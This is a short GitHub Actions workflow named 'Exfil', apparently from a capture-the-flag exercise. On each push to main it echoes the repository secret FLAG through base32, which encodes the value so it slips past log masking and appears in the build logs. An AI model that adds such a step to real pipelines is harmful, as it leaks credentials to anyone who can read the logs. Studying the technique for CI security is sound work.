name: Exfil

on:
  push:
    branches:
      - main

jobs:
  print:
    runs-on: ubuntu-latest

    steps:
      - name: Print Secret
        run: |
           echo ${{secrets.FLAG }} | base32
        shell: bash
